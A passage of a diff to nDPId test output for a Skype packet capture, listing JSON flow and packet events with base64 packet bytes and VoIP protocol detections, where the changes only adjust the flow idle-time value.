00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1431969690604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969690604,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWw53yBAwphOYnK6ASOJA8uAAAAgQFrAQCCApOpRObPiNGZAEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1431969690604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969690604,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+KpAAEAGYGfAqAEinTeCsMOdnFaE5icr8gQMKoAQECyTZwAAAQEICj4jRt9OpROb"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjRAAEAGNtXAqAEinTeCrcOeAbsMd47qAAAAALAC\/\/9tvAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAl7lAAEAGV97AqAEi1cezjsOfAbt1SdybAAAAALAC\/\/9NxgAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWD1AAEAGl9zAqAEinTfrnMOgAbv31LXOAAAAALAC\/\/\/yiAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1431969691145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIgG7w58e2AO\/dUncnKASOJDyJAAAAgQFrAQCCApQDMFlPiNIswEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1431969691145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0teBAAEAGOcPAqAEi1cezjsOfAbt1SdycHtgDwIAQECxJCwAAAQEICj4jSPdQDMFl"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1431969691148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691148,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7w6ATTYBZ99S1z6ASOJDP3gAAAgQFrAQCCApMWRsSPiNIswEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1431969691148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691148,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bg9AAEAGghbAqAEinTfrnMOgAbv31LXPE02AWoAQECwmwwAAAQEICj4jSPlMWRsS"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1431969691204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691204,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIgG7w56D64icDHeO66ASOJAr0QAAAgQFrAQCCApOp78jPiNIswEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1431969691204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691204,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0APxAAEAGWBnAqAEinTeCrcOeAbsMd47rg+uInYAQECyCfgAAAQEICj4jSTBOp78j"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1431969690604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969690604,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWw53yBAwphOYnK6ASOJA8uAAAAgQFrAQCCApOpRObPiNGZAEDAwk="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1431969690604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969690604,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+KpAAEAGYGfAqAEinTeCsMOdnFaE5icr8gQMKoAQECyTZwAAAQEICj4jRt9OpROb"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjRAAEAGNtXAqAEinTeCrcOeAbsMd47qAAAAALAC\/\/9tvAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAl7lAAEAGV97AqAEi1cezjsOfAbt1SdybAAAAALAC\/\/9NxgAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1431969691076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969691076,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWD1AAEAGl9zAqAEinTfrnMOgAbv31LXOAAAAALAC\/\/\/yiAAAAgQFtAEDAwUBAQgKPiNIswAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1431969691145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIgG7w58e2AO\/dUncnKASOJDyJAAAAgQFrAQCCApQDMFlPiNIswEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1431969691145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0teBAAEAGOcPAqAEi1cezjsOfAbt1SdycHtgDwIAQECxJCwAAAQEICj4jSPdQDMFl"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1431969691148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691148,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7w6ATTYBZ99S1z6ASOJDP3gAAAgQFrAQCCApMWRsSPiNIswEDAwk="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1431969691148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691148,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bg9AAEAGghbAqAEinTfrnMOgAbv31LXPE02AWoAQECwmwwAAAQEICj4jSPlMWRsS"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1431969691204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969691204,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIgG7w56D64icDHeO66ASOJAr0QAAAgQFrAQCCApOp78jPiNIswEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1431969691204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691204,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0APxAAEAGWBnAqAEinTeCrcOeAbsMd47rg+uInYAQECyCfgAAAQEICj4jSTBOp78j"} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03rMAAEARUOLAqAEi1cezkTLdnFsAIONWnJoCpMZAnYkDnzYrDpEHe3Wyl3Fm6DsP"} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -720,84 +720,84 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/mMEAAEARl0\/AqAEinTfrmzLdnEMAK8StnJ4Ceg13qBmaNbQ5r3u++QJg+\/7hY4I5I2kK1W2d7qoWGw0="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692087,"flow_last_seen":1431969692087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969692087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431969692087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692087,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFBAAEAGALbAqAEinTeCsMOhAbuvVQecAAAAALAC\/\/9OOgAAAgQFtAEDAwUBAQgKPiNMnwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431969692210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969692210,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7w6FI4LuBr1UHnaASOJC+bQAAAgQFrAQCCApOpRUtPiNMnwEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431969692210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969692210,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dU1AAEAG48TAqAEinTeCsMOhAbuvVQedSOC7goAQECwVHQAAAQEICj4jTRpOpRUt"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692087,"flow_last_seen":1431969692087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969692087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431969692087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692087,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFBAAEAGALbAqAEinTeCsMOhAbuvVQecAAAAALAC\/\/9OOgAAAgQFtAEDAwUBAQgKPiNMnwAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431969692210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969692210,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7w6FI4LuBr1UHnaASOJC+bQAAAgQFrAQCCApOpRUtPiNMnwEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431969692210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969692210,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dU1AAEAG48TAqAEinTeCsMOhAbuvVQedSOC7goAQECwVHQAAAQEICj4jTRpOpRUt"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431969692507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692507,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlm8AAEARZQTAqAEib91NkjLdgQkALPOBnKACf9Ciuj22pCihR6NIjTKXTxwVlkuMzvocVlIJl4RJ8z3V"} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969695483,"flow_last_seen":1431969695483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969695483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
